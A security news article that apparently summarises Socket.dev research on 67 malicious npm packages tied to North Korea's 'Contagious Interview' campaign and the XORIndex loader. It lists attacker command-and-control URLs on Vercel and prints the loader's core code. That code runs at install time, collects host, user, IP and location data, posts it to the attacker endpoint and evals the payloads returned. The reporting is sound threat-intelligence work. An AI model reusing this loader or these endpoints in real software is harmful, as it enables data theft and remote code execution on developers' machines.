North Korean Hackers Weaponized 67 Malicious npm Packages to Deliver XORIndex Malware

North Korean threat actors have escalated their software supply chain attacks with the deployment of 67 malicious npm packages that collectively garnered over 17,000 downloads before detection.

This latest campaign represents a significant expansion of the ongoing “Contagious Interview” operation, introducing a previously unreported malware loader dubbed XORIndex alongside the existing HexEval Loader infrastructure.

The newly discovered XORIndex malware, named for its distinctive use of XOR-encoded strings and index-based obfuscation techniques, demonstrates the threat actors’ continued evolution in developing sophisticated evasion mechanisms.

The malicious packages infiltrated the npm ecosystem through 18 different accounts registered with 15 distinct email addresses, with 27 packages remaining active on the registry at the time of discovery.

Socket.dev analysts identified this campaign as part of a broader North Korean cyber espionage effort targeting developers, cryptocurrency holders, and individuals with access to sensitive credentials.

The XORIndex Loader operates as a multi-stage attack framework, initially collecting host metadata before decoding and executing the BeaverTail second-stage malware, which subsequently references the InvisibleFerret backdoor for persistent access.

The campaign’s infrastructure relies on hardcoded command and control endpoints hosted on legitimate platforms like Vercel, utilizing URLs such as https://soc-log.vercel.app/api/ipcheck and https://log-writter.vercel.app/api/ipcheck.

This approach allows the threat actors to maintain operational security while leveraging trusted hosting services to evade detection mechanisms.

The XORIndex Loader has accumulated over 9,000 downloads between June and July 2025, operating in parallel with the continuing HexEval campaign that has generated an additional 8,000 downloads across newly discovered packages.

This dual-track approach demonstrates the threat actors’ commitment to maintaining multiple attack vectors simultaneously.

XORIndex Infection Mechanism and Code Execution

The XORIndex Loader’s infection mechanism begins immediately upon package installation, leveraging Node.js post-install hooks to execute malicious code without user interaction.

The malware employs a sophisticated reconnaissance phase, gathering comprehensive system information including hostname, username, external IP address, geolocation data, and platform details before establishing communication with command and control servers.

A representative code snippet from the eth-auditlog package demonstrates the loader’s core functionality:-

// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
    const ip = await publicIp.v4();
    const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;
    return {
        host: os.hostname(),
        user: os.userInfo().username,
        ip,
        location: geo,
        platform: os.platform()
    };
}

// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function writer() {
    const info = await gatherInfo();
    const version = process.env.npm_package_version;

    axios.post("https://log-writter.vercel.app/api/ipcheck", { ...info, version })
         .then(res => {
             eval(res.data.s1);    // Execute primary payload
             eval(res.data.s2);    // Execute optional secondary payload
         });
};

The loader’s evolution from basic prototypes to sophisticated malware demonstrates deliberate advancement in obfuscation techniques, progressing from simple remote code execution capabilities to comprehensive system profiling and multi-endpoint command rotation, positioning it as a formidable threat to software supply chain security.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now